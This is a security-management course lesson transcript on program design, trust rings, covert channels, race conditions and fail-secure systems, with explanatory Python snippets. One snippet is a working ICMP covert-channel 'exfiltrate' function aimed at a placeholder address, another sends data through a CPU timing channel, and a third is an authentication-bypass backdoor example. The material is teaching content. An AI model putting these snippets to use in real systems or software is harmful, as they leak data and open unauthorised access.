Time
2 hours 5 minutes
Difficulty
Advanced
CEU/CPE
5

Video Description

This lesson offers an overview of information security program management and covers what will be addressed over the entire module:
- Security architecture
- Security models
- Evaluation criteria
- Certification and accreditation
- Technical project management
- Cost-benefit analysis
- Trusted computing/protected access
- Vulnerabilities

Video Transcription

00:04
All right, moving on with our third chapter of Cybrary's Certified Information Security Manager course. Our third chapter is on information security program management. So everything from the design and the architecture of a system through its creation,
00:23
the models on which we build these systems, how we evaluate the systems, and how we determine that they're ultimately to be certified and accredited,
00:32
as well as how we manage this project from beginning to end with security in mind. So a lot of good information in this chapter. Now, the first thing I just want to review again very quickly is cost-benefit analysis. In the risk management chapter, we talked about that, right? We talked about the idea that
00:50
you don't want to spend more money to secure a system
00:53
than the value of what's being protected, right? And we talked about, you know, we start off by identifying the value of our asset, we look at threats, we look at vulnerabilities, and then we try to find a cost-effective solution. And I just wanted to reiterate that
01:07
because you have to have an honest understanding of cost-benefit analysis before you start on your design.
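To make that concrete, here is a minimal sketch of the arithmetic behind that kind of cost-benefit decision, using standard risk-management terms (annualized loss expectancy and safeguard cost); the dollar figures are purely illustrative, not from this lesson:

```python
# Hedged sketch: standard quantitative risk terms (ALE = SLE * ARO), illustrative numbers only.

def annualized_loss_expectancy(asset_value, exposure_factor, annual_rate_of_occurrence):
    """ALE = single loss expectancy (asset value * exposure factor) * expected events per year."""
    single_loss_expectancy = asset_value * exposure_factor
    return single_loss_expectancy * annual_rate_of_occurrence

def safeguard_value(ale_before, ale_after, annual_cost_of_safeguard):
    """Positive means the control is worth buying; negative means we'd spend more than we protect."""
    return (ale_before - ale_after) - annual_cost_of_safeguard

ale_before = annualized_loss_expectancy(asset_value=200_000, exposure_factor=0.5, annual_rate_of_occurrence=0.2)
ale_after  = annualized_loss_expectancy(asset_value=200_000, exposure_factor=0.5, annual_rate_of_occurrence=0.05)
print(safeguard_value(ale_before, ale_after, annual_cost_of_safeguard=8_000))  # 7000.0 -> worth doing
```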
01:14
If you'll remember the question I asked in the last module: how much security is enough?
01:19
And even though so many people are tempted to say you could never have enough security, you can. The amount of security that we're gonna enforce is just enough. And what I mean by that is we're going to make absolutely certain that we protect our assets to the degree that is warranted.
01:36
We're not going to spend any more money than we have to in doing so, though
01:40
the whole purpose of security is to support our organization. And if we spend too much on security, we're not supporting our company for the same reason that I don't have a security guard in front of my house and a retina scan to get into my
01:53
kitchen or whatever that might be. We find the balance and we provide the amount of security that's enough,
02:00
right? We don't want too much security. Why? Well, because it costs money, but
02:06
the other costs associated with security are maybe less tangible, but they're every bit as important to understand. Performance: you will almost always decrease performance when you add security. It takes longer.
02:21
You know, every now and then if I just run out to my car to grab something, I don't lock my house door to go out to my car. Why?
02:27
Because it takes too long to lock and to unlock for the 10 seconds I'm gonna be outside, right? Security slows you down.
02:36
Is it worth it? Yeah, up until the degree where it's no longer worth it, if you know what I mean. So the idea is, we expect that performance will suffer and we find that balance between our need for performance
02:50
and our need for security. There's always a mix. Now, we don't really go into a lot of discussion here on separation of duties, not in this chapter, but separation of duties is so important because every role in the organization has its own purposes. One of the biggest problems I see in a lot of organizations
03:07
is they don't separate the role of network administrator
03:10
from security administrator
03:13
because they don't want to spend the money to hire two people with similar skill sets. And I say, why not? Our network guy knows how to secure the network. Yes, but your network person, their top priority is availability and performance. You know, I did many years as a network administrator. I knew I was doing my job when the phone wasn't ringing. It was quiet.
03:32
Everybody had what they needed to have. But as a security administrator, that's the opposite of what my goals are. As a security administrator, I want to make things secure. I wanna lock them down. I don't want everything to be quick and easy to get to. So when we think about a network administrator whose primary goal
03:53
is performance
03:53
versus a security administrator being focused on security, those are cross purposes. So when we do this cost-benefit analysis, we have to realize we will sacrifice performance. It's just the way that it is with security, but we need to make sure we're making a good decision on how much performance we will sacrifice,
04:13
because at some point in time, if people can't do the work that they need to do, that's obviously not acceptable.
04:17
So the point I want to make is you've got to have an honest discussion about what sort of degradation of performance is acceptable, and you've gotta have that discussion with somebody other than the person whose job rests on high performance, if you know what I mean. So
04:34
another cost is performance. You will almost always lose some performance
04:40
to security. Security slows things down.
04:43
Okay, ease of use. It is much easier to access things on a non-secure network. If you've ever gone to a friend's house and wanted to get on their WiFi network, for instance, you have that friend who has the 35-
04:57
character WiFi password with upper and lower case, alphanumeric, non-alphanumeric, all kinds of stuff
05:03
that's very difficult.
05:05
It's hard to use. Can't you just have your WiFi password be "password"? Make it easy, right? People like ease of use. They like things to work right out of the box. That's another cost for security, right? So when you're designing a system,
05:20
you have to understand that there will be some tradeoffs depending on the value of what you're protecting.
05:27
You may in some cases say, well, this is not the most secure option, but we're doing it for ease of use. You know, take passwords as a whole: it's much more secure to have smart cards or biometrics or any of numerous other, more secure methods than passwords. But why do we use passwords? Because they're easy, because they're cheap.
05:45
And let me tell you, as somebody that's been in IT for a long time,
05:47
a multitude of decisions come down to those two words. We likes cheap and we likes easy, and when we get them together, a lot of decisions get made. So even in design, these are things you have to understand in order to meet the requirements of the product.
06:03
All right, backwards compatibility. Often as we move forward, we get stronger technology, better technology, faster technology, more secure technology that's not always backwards compatible with older systems and older services. So if we do need this to work in an older environment,
06:20
sometimes we have to back off on security in order to exist,
06:25
and that happens in many instances. So a lot of times when we configure a system,
06:30
we usually configure it to work in, you know, a couple of different modes where its primary or preferred mode is more secure. But then, in certain situations where that more secure setting is not available, maybe it can back down to a less secure setting. You know, it really just depends. But we have to understand again, as part of system design and architecture,
06:49
what our goals are.
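As a rough sketch of that "prefer the secure mode, fall back only when necessary" idea, the snippet below negotiates the strongest option both sides support; the mode names and their ranking are hypothetical examples, not settings from the slides:

```python
# Hedged sketch: negotiate the most secure mode both sides support, falling back only for legacy peers.
# The mode names and their ranking are hypothetical examples, not any specific product's settings.

MODES_MOST_SECURE_FIRST = ["kerberos", "ntlmv2", "ntlm"]  # preferred first, legacy last

def negotiate_mode(our_modes, peer_modes, allow_legacy_fallback=False):
    for mode in MODES_MOST_SECURE_FIRST:
        if mode in our_modes and mode in peer_modes:
            if mode == "ntlm" and not allow_legacy_fallback:
                break  # don't silently drop to the weakest option
            return mode
    raise RuntimeError("no acceptable common mode; refuse rather than run insecurely")

print(negotiate_mode({"kerberos", "ntlmv2"}, {"ntlmv2", "ntlm"}))  # -> "ntlmv2"
```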
06:50
User acceptance. Users don't like to have to jump through a lot of hoops. You know, users already have a ton of passwords to keep up with, if you think of all the websites users go to, all the different passwords they have to be aware of. CAC cards: that's one more thing I have to carry and not lose and keep up with and put in the reader and remember to take out of the reader.
07:11
I know all this sounds very silly,
07:13
but we do have to consider how much responsibility we're gonna continue to place on end users, because it's cumbersome for them. So as IT professionals, we want to implement security, but we also want to make this as easy on the users as possible. Once users start to resent the security features we implement,
07:30
then their next step is to start figuring out a way to bypass them.
07:33
Our goal is to keep our users happy whenever at all possible. Okay, so these are discussions that we have to have before the design of the system, before we begin the concepts and the architecture and figure out the goals and how we're gonna implement them, because it's an important consideration. How much security is enough?
07:53
Just enough, so that we can provide the other services as well.
07:57
All right, now when we start talking about security architecture, this doesn't get really in depth; this is just very appropriate for managers. But we do have to understand some of the ways that we implement security into the design of certain elements.
08:11
And we'll talk a little bit about the idea of trusted computing, layering and isolation,
08:16
and then boundaries and enforcing these boundaries. So when we design a system, what we want to understand from the start is there are elements that we consider to be very secure, there are elements that we consider to be sort of secure, and elements we consider to be not secure at all. Or at least that's how things have traditionally been designed.
08:37
A good example of this is to talk a little bit about a concept called ring
08:41
architecture, and most operating systems are designed on a ring architecture. This is purely conceptual, and the idea is these rings indicate different layers of trust. Originally, Windows was designed upon a four-ring architecture,
08:56
and so, ultimately, another way to think about that was four layers of trust within the operating system.
09:03
So the elements that are considered to be part of ring zero, so to speak, are in this little center ring, you know, visually, and this is called the trusted computing base. The TCB
09:16
would fall in ring zero, and that's a term that comes to us from a book called the Orange Book, the Trusted Computer System Evaluation Criteria.
09:28
That's a book that the government used to use as a means of evaluating systems based on their security implementations. So the TCB, the trusted computing base, these are those elements most tightly, most highly trusted.
09:43
You know, if you think about it,
09:46
there are some things in your system that have to be beyond reproach, and there are other things that we know just aren't trustworthy at all.
09:52
Okay, so, for instance, I don't care how secure your operating system is, I don't care how secure your memory is, how secure this, that, or the other is. If your system BIOS isn't secure,
10:05
and I'm able to corrupt that BIOS and cause your system to boot to another location, for instance, none of that other stuff matters. So your system BIOS must be highly, highly trustworthy.
10:18
Your processor. If your processor isn't trustworthy,
10:22
you don't have a trustworthy system, no matter what you do.
10:24
Your RAM, your memory: if that's not trustworthy, you're dead in the water. All of those elements that have the highest trust are considered to be part of the trusted computing base, and architecturally speaking, they're in ring zero. Okay,
10:41
these are the most protected elements.
10:46
Now there are things that we don't trust quite as much, like maybe file system drivers. I know the slide says device drivers; I would really think more like file system drivers, like drivers for the NTFS file system if you're a Windows person. Still part of the operating system,
11:03
the memory manager. So still, you know, fairly trusted elements, but not
11:07
as trusted as the TCB. So they're ring one. At ring two, we become a little less trusted again. So: very trusted, a little less trusted, a little less trusted, not trusted at all. At ring two, you've seen things like device drivers that provide the interface between your hardware and your operating system, and then at ring three,
11:28
our applications. Now, applications are not trustworthy at all. I don't know who wrote this application.
11:33
I don't know how they tested it. I don't know how it addresses memory issues and so on. So out here are these items that we don't trust at all. So this was how the original Windows operating system was designed: four different layers of trust.
11:48
So the principle behind this layering is you also get isolation. You have this little conceptual boundary between ring zero and ring one, then another boundary between one and two. And the idea is less trusted items cannot directly access more trusted items.
12:05
Okay, less trusted can't access more trusted
12:09
unless it's given an interface
12:13
to travel through.
12:15
And that's a principle we're gonna talk about a lot in this chapter, the idea of protected access. You know, think about if you work at a bank: you're brand new, you've just been hired as a bank teller. Somebody gives you $10,000 to deposit.
12:28
As a bank teller who's been there two weeks, do you have keys to put that money in the vault?
12:33
No, hopefully not. But the money needs to go in the vault and you've got the money. So what do you do? You hand off the money to the bank manager, who's a trusted intermediary or a trusted interface, and he accesses the vault. Okay, so I don't let an application directly access memory
12:52
unless it goes through what we call a trusted interface.
12:56
And you may have heard the term API, application programming interface. That's what those do: application programming interfaces allow your outer-layer applications to have secured access to inner-layer items. Hopefully, that makes sense.
13:15
But this whole idea is that you don't allow untrusted items
13:16
to access your precious resources. They must go through an interface. And that comes to us from a security model called Clark-Wilson. And we'll talk about the Clark-Wilson security model in more depth in just a bit.
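To picture that bank-teller analogy in code, here is a minimal, hypothetical sketch of a trusted interface mediating access to a protected resource; the class and method names are illustrative, not a real API:

```python
# Hedged sketch of mediated access: callers never touch the protected resource directly;
# they go through a trusted interface that checks and audits the request (names are illustrative).

class Vault:
    """The protected, inner-ring resource."""
    def __init__(self):
        self._contents = []

    def _store(self, item):          # leading underscore: not meant to be called directly
        self._contents.append(item)

class TrustedInterface:
    """The 'bank manager': the only sanctioned path into the vault."""
    def __init__(self, vault, authorized_roles):
        self._vault = vault
        self._authorized_roles = authorized_roles

    def deposit(self, caller_role, item):
        if caller_role not in self._authorized_roles:
            raise PermissionError(f"{caller_role} may not access the vault")
        print(f"audit: {caller_role} deposited {item!r}")
        self._vault._store(item)

vault = Vault()
api = TrustedInterface(vault, authorized_roles={"teller"})
api.deposit("teller", "$10,000")        # allowed, and audited
# api.deposit("visitor", "$10,000")     # would raise PermissionError
```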
13:30
Okay, so this idea of boundaries and layering and isolation: operating systems are built on these concepts to separate out trusted from untrusted. Now, Windows functions on simply a two-ring model. You're either trusted or you're untrusted.
13:48
You know, let's forget these little subtle layers of trust. You're either fully trusted or you're not trusted at all.
13:54
And so really, that requires anything from here, here, and here
14:01
to be secured in their function and in their methods to access inner-ring items, and that really is a better measure. It's interesting, but early on, before they decided on the four-ring architecture, the Windows architects originally wanted to have a 64-ring architecture,
14:18
which I think is kind of interesting. It gives you a little bit of insight into the
14:20
mindset of software developers: let's have 64 different layers of trust. Ultimately they settled on four, and now they've simplified that even more with two layers. Okay, so this idea of isolation and protection, it happens not just with the ring architecture of the operating system,
14:39
but also for processes
14:41
as well.
14:43
You know,
14:46
just to give you a couple of definitions real quick (they're not on the slides, but just to give you this idea): I go out and I buy an application. I go out and buy Microsoft Word, for instance. Okay, that's a program. So a program and an application, those are synonymous.
15:01
If I open Microsoft Word, now it gets loaded into memory. It becomes a process,
15:05
and then every individual instruction within Word is a thread, you know. So like printing or changing orientation, those are each threads. So a program is just an application; you open that program up, and now it's running in memory, it's a process; and individual instructions are threads. Those are just a couple of definitions I
15:26
would want you to have.
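If it helps to see those three definitions in code, here is a small sketch in Python: the script on disk is the program, running it creates a process, and the individual units of work inside it are threads.

```python
# Hedged sketch: a process (this running script) spinning up threads for individual tasks,
# the way Word might run "print" and "change orientation" as separate threads.
import os
import threading

def print_document():
    print(f"printing... (thread {threading.current_thread().name})")

def change_orientation():
    print(f"changing orientation... (thread {threading.current_thread().name})")

if __name__ == "__main__":
    print(f"this program is running as process {os.getpid()}")
    tasks = [threading.Thread(target=print_document, name="print"),
             threading.Thread(target=change_orientation, name="orient")]
    for t in tasks:
        t.start()
    for t in tasks:
        t.join()
```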
15:26
But every process needs its own set of resources, and really, processes are a lot like children. You know, if you've ever had to babysit two kids, or if you have two or more kids at home. I actually took my niece and my nephew out swimming a few weeks back,
15:43
and so they're standing on opposite ends of the pool doing totally different things, both of them screaming,
15:48
Look at me, Look at me. Look at me.
15:50
That's how processes are. Processes wanna pretend they're the only process on your system. They don't want some other process stealing their limelight, stealing their resources, stealing their glory. So if we're gonna allow these two processes to exist at the same time, we have to find a way of isolating them.
16:10
We're almost tricking processes into thinking they're the only ones
16:14
on the system.
16:15
So we do that by isolating them and giving them each their own stack of memory.
16:21
You might hear it called the stack or, you know, a set of memory. Each one has their own buffer of memory, if you will. They have their own time with the processor. They have their own time with configuration files. Again, kind of like kids:
16:36
each of the children wants their own space. They want their own resources, they want their own toys, they want their own attention.
16:41
So that's another element of isolation that has to be built into a system's design: a means for the operating system to allow multiple processes to run, but you still allow them to run independently so they don't interfere with each other. You can get a lot more in depth with those concepts, but again, we're gonna keep this at the management level.
17:00
All right, so
17:02
vulnerabilities. When you have these systems, there are many different types of vulnerabilities that are actually attacks or allow for attacks on the actual architecture itself. One of the most common attacks that really exploits the system's architecture is an attack called the covert channel.
17:21
Now, a covert channel is exactly what it sounds like: a hidden channel. It's a hidden path for communication. Really, it's a means of communicating between processes across a path, or sometimes in a manner, that wasn't intended.
17:37
Now, there are two types: there's a covert storage channel and a covert
17:41
timing channel.
17:42
A covert storage channel is about where the data is placed, where it's stored. So, for instance, there was an attack a while back called the Loki attack, L-O-K-I, like Thor's brother in the movies. The Loki attack
17:56
used ICMP header space, the space in an ICMP header, to store and transmit data. That's not where data goes; it doesn't go behind an ICMP header. There's a specific part of a packet that's designated for the data information, the payload.
18:14
So because data was stored somewhere that wasn't designed for the storage of that data,
18:18
that was a covert storage channel.
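Just to illustrate the general concept of a covert storage channel (this is a simplified sketch, not a reproduction of the actual Loki tool), data can be smuggled into ICMP header fields that were never meant to carry it. This assumes the third-party scapy library and privileges to send raw packets:

```python
# Hedged sketch of a covert storage channel: hiding two bytes at a time in the ICMP echo
# identifier field, which normally just matches requests to replies. Requires scapy and
# root privileges to actually send; shown for illustration only.
from scapy.all import IP, ICMP, send

def exfiltrate(message: bytes, target_ip: str):
    for i in range(0, len(message), 2):
        chunk = message[i:i + 2].ljust(2, b"\x00")
        hidden = int.from_bytes(chunk, "big")
        pkt = IP(dst=target_ip) / ICMP(type=8, id=hidden, seq=i // 2)  # data rides in the header
        send(pkt, verbose=False)

# exfiltrate(b"secret", "192.0.2.10")  # 192.0.2.x is a documentation-only address
```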
18:22
Now, a covert timing channel is even more sophisticated, because what that does is one process communicates to another process through the modulation of system resources. So what that means is one process
18:40
might spike processor utilization
18:42
up to 100%
18:45
then drop it down, then spike it up, down, up, down, up, down according to a certain predefined pattern.
18:51
So it's using the processor almost like Morse code to communicate with another process. That's high end; that's a pretty sophisticated attack, but that's called a covert timing channel.
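Here is a rough sketch of what the sending side of a covert timing channel could look like: it encodes each bit by either loading the CPU or idling for a fixed time slot, while a cooperating receiver (omitted here) samples utilization on the same schedule. The slot length and encoding are assumptions for illustration:

```python
# Hedged sketch: transmit bits by modulating CPU load in fixed time slots.
# A bit of 1 = busy-loop for the slot (high utilization); 0 = sleep (low utilization).
import time

SLOT_SECONDS = 0.5  # both sides must agree on the slot length in advance

def send_bits(bits):
    for bit in bits:
        end = time.monotonic() + SLOT_SECONDS
        if bit == "1":
            while time.monotonic() < end:   # spike the processor
                pass
        else:
            time.sleep(SLOT_SECONDS)        # let it idle

def send_message(text):
    for ch in text:
        send_bits(format(ord(ch), "08b"))   # Morse-code style: one character = eight slots

# send_message("hi")  # a receiver sampling CPU utilization every 0.5 s can recover the bits
```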
19:00
Other types of attacks on system architecture: maintenance hooks. These don't start out as being an attack. A lot of times a developer or programmer will leave a little maintenance hook, which is a quick way in so that they don't have to go through all the processes of authentication, just a quick way that they can jump into the code to make a change.
19:19
But if you leave that maintenance hook in there and it's still available, someone can exploit that.
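As a purely hypothetical illustration (not taken from any real product), a maintenance hook often looks like a leftover shortcut around authentication, something like this:

```python
# Hedged, made-up example of a maintenance hook: a developer shortcut that skips
# real authentication. Harmless during development, a backdoor if it ships.
import hmac

STORED_HASHES = {"kelly": "a9b7ba70783b617e9998dc4dd82eb3c5"}  # placeholder hash, illustrative only

def authenticate(username, password_hash):
    if password_hash == "debug-override":   # <-- the maintenance hook left in by a developer
        return True                         # bypasses authentication entirely
    expected = STORED_HASHES.get(username)
    return expected is not None and hmac.compare_digest(expected, password_hash)
```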
19:26
Okay,
19:26
Now, race conditions.
19:30
Race conditions, as in it's a race to the finish line, are attacks on the timing of a system,
19:37
and there are lots of different types of race attacks. You know, if you just look at how a system should work generally:
19:44
I should identify to that system with my username.
19:48
I will authenticate using a password.
19:51
Once I've authenticated, my password's been verified, and now I'm authorized to perform certain activities and actions, right? So: identify, authenticate, authorize.
20:03
But if I can break the architecture of a system and cause the authentication process to slow way down
20:11
and speed up authorization
20:14
then I might be able to get authorized based on the username rather than knowing a password. That's a race condition. Anything that works on the timing of system events is a race condition.
20:26
There's another type of race condition, a specific one called TOC/TOU, and that stands for time of check, time of use. So what happens with time-of-check, time-of-use attacks? Let me
20:41
give you an example. Let's say that I have five $20 bills,
20:48
okay? And you have a $100 bill.
20:52
Man, I'm tired of carrying around all these twenties. If I give you five twenties, will you give me a $100 bill? And you say yes. So I make a big production: 20, 40, 60, 80, 100. I count that money out and I put it on the desk.
21:07
You turn around to get the $100 bill out of your back pocket, and when you do that, I grab one of the twenties and tuck it back in my pocket.
21:14
By the time you give me the $100 bill and take what's on the table and put it in your pocket, I've created a variance between when you verified the money was there and when you turned back around and were actually able to use the money. So there's a difference between when you check and when you use.
21:32
Well, in this example, the way you keep that problem from happening is, as soon as I put down 20, 40, 60, 80, 100, you grab that money and stick it in your pocket, right?
21:41
So that's true with software as well. This might happen when a process verifies that a configuration file is accurate and complete:
21:53
if it doesn't immediately use that configuration file, but instead checks it, goes and does something else, and then comes back half an hour later to use it, there's a big amount of time in which a variance could be created. So the moral of the story with TOC/TOU attacks is: don't allow a lapse between when something is checked and when it's used.
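In code, the classic example of a TOC/TOU window is checking a file in one step and using it in a later, separate step; a common mitigation is to collapse the check and the use into a single operation. This is a generic sketch, not tied to any particular system:

```python
# Hedged sketch of a TOC/TOU window and one common way to close it.
import os

def vulnerable_read(path):
    if os.access(path, os.R_OK):      # time of check
        # ... an attacker can swap the file (e.g., for a symlink) in this gap ...
        with open(path) as f:         # time of use
            return f.read()
    return None

def safer_read(path):
    try:
        with open(path) as f:         # check and use collapse into one step;
            return f.read()           # failure is handled instead of pre-checked
    except OSError:
        return None
```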
22:12
This is system architecture design that keeps this from happening.
22:17
So for you as an end user, you as a manager: this isn't a configuration setting, but it's so essential that our architects understand these types of attacks and these types of conditions, because we need to make sure that we eliminate, as much as possible, any of those lapses that would allow an attacker
22:36
to have an advantage, or to have an opportunity to create an exploit.
22:40
The rest of what's on this slide is just another idea about secure architecture: a system should be designed to fail in such a way that its resources are secure. In a little while, we're gonna talk about security models, and security models are concepts on which we build or design a system,
23:00
and there's a security model called the secure state model.
23:04
And ultimately, what this model says is if a system starts securely,
23:11
and if a system runs securely
23:15
and if a system fails or shuts down securely, then it's secure.
23:21
Now, I know that kind of sounds like a no brainer, and in some ways it is. But what's so important to understand about that is unless a system is secure in all of those states, then it's not secure at all.
23:33
So again, I don't care how secure your operating system is and all the security mechanisms and features you have. If I can compromise your BIOS and force you to start insecurely, then you're not a secure system,
23:48
right? Or if I can create a failure so that your system fails in such an unexpected way that it leaves all the doors open, so to speak, then it's not a secure system.
23:59
So, according to the secure state model, we need to make sure that we implement design strategies to secure during startup, and startup is actually the hardest time to secure a system, because all the security mechanisms haven't been loaded yet.
24:15
So how are you gonna secure a system where the security mechanisms haven't been loaded yet? What do you do?
24:21
Right. And then we have to function securely, and then we have to shut down securely. So here, when we do talk about shutting down securely, what we mean is that the system is able to fail, even unexpectedly,
24:33
in such a manner that all of its processes are closed so that no further breach can happen. And that is actually called maintenance mode. Maintenance mode is when the system fails in such a way that the processes are not able to be further accessed.
24:52
No further compromise can happen. And that's the goal.
24:55
We refer to that as being fail secure. Now, fail secure in this concept is very different than what fail secure would be in physical security. Okay, you might also hear this called fail safe. Here, don't confuse fail safe or fail secure
25:10
for a system with fail safe or fail secure like with automatic door locks, something like that. It's totally different.
25:15
So when we say fail safe or fail secure, we mean that the system fails into maintenance mode, so no further breach can happen.

Up Next

Enterprise Security Architecture

A framework for applying a comprehensive method of describing the current and future structure for an organization's security processes so that they align with the company's overall strategic direction.

Instructed By

Kelly Handerhan
Senior Instructor